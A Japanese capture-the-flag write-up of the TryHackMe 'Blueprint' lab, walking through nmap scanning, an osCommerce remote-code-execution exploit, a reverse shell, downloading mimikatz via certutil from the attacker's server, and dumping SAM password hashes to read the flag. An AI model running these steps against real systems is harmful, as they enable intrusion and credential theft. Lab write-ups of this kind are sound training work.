一部を■で隠しています。
nmapしよう
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49159/tcp open msrpc Microsoft Windows RPC 49160/tcp open msrpc Microsoft Windows RPC
いっぱいある。
httpが2つあるので探索してみると、:8080/oscommerce-2.3.4/
にてE-commerceのサイトが立ち上がっていることが分かる。
脆弱性を探してみよう。
oscommerce
$ searchsploit oscommerce ---------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------------- osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py ---------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results Papers: No Results
searchsploitで検索して見てみるとRCEできるものが1つある。
これは使えそう。
$ searchsploit -p 44374 Exploit: osCommerce 2.3.4.1 - Remote Code Execution URL: https://www.exploit-db.com/exploits/44374 Path: /usr/share/exploitdb/exploits/php/webapps/44374.py File Type: ASCII text, with CRLF line terminators $ cp /usr/share/exploitdb/exploits/php/webapps/44374.py 44374.py
使用する際はexploitコードのURLと実行したいPHPコードを変えて動かそう。
system("whoami");
とするとWarning: system() has been disabled for security reasons in C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes\configure.php on line 27
といわれてしまう。
ok. phpinfo();
を動かしてみよう。
disable_functions | system
リバースシェルを試していこう…
いこう…
…
解説を見る
どれを使っても刺さらないし、Metasploitはあんまり入れたくないしで、一旦解説見た。
書いてあったものを一通り試したがダメか…
Metasploit入れるか…
Metasploitでリバースシェルする
THM write-up: Blueprint | Planet DesKelの通りやったんだけど、meterpreter起動まで至らなかった。
とりあえずリバースシェルまで行けたので、このままやることにする。
mimikatz
mimikatzを使って認証情報を得ることにする。
C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>systeminfo System Type: X86-based PC
32bitで動いているみたい。32bitのmimikatz.exeを手元に用意して、python -m http.server 80
でウェブサーバを起動して持って来よう。
C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>certutil -urlcache -f http://[yourip]/mimikatz.exe mimikatz.exe C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>mimikatz.exe mimikatz.exe .#####. mimikatz 2.2.0 (x86) #19041 May 29 2021 13:23:14 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # lsadump::sam RID : 000003e8 (1000) User : Lab Hash NTLM: ■■■■■■■■■■■■■■■■■■■■
Labのハッシュが手に入る。CrackStationで検索すると答えが見つかる。
root.txt
AdminのDesktopによく置いてあるので、とりあえずそこを探すとあって、なぜか読める。
C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes>cd C:\Users\Administrator\Desktop cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 14AF-C52C Directory of C:\Users\Administrator\Desktop 11/27/2019 07:15 PM <DIR> . 11/27/2019 07:15 PM <DIR> .. 11/27/2019 07:15 PM 37 root.txt.txt 1 File(s) 37 bytes 2 Dir(s) 19,504,631,808 bytes free C:\Users\Administrator\Desktop>more root.txt.txt more root.txt.txt ■■■■■■■■■■■■■■■■■■■■■■■■■■